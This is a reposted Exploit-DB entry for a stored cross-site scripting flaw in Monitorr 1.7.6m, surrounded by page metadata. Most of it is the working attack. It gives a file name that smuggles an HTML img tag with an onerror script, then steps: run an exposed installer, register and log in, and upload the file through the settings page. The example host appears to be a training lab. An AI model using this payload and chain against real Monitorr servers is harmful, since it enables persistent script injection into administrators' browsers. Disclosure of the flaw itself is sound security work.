Montiorr 1.7.6m – Persistent Cross-Site Scripting

• Exploit Database
• 20 阅读

• 作者： Ahmad Shakla
  日期： 2021-04-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49806/

• # Exploit Title: Montiorr 1.7.6m - Persistent Cross-Site Scripting
  # Date: 25/4/2021
  # Exploit Author: Ahmad Shakla
  # Software Link: https://github.com/Monitorr/Monitorr
  # Tested on: Kali GNU/Linux 2020.2
  # Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html
  
  An attacker can preform an XSS attack via image upload
  
  Steps :
  
  1)Create a payload with the following format : 
  ><img src=x onerror=alert("XSS")>.png
  
  2) Install the database by going to the following link :
  https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php
  
  3)Register for a new account on the server by going to the following link :
  https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register
  
  4)Login with your credentials on the following link :
  https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php
  
  5)Go to the following link and upload the payload :
  https://monitorr.robyns-petshop.thm/settings.php#services-configuration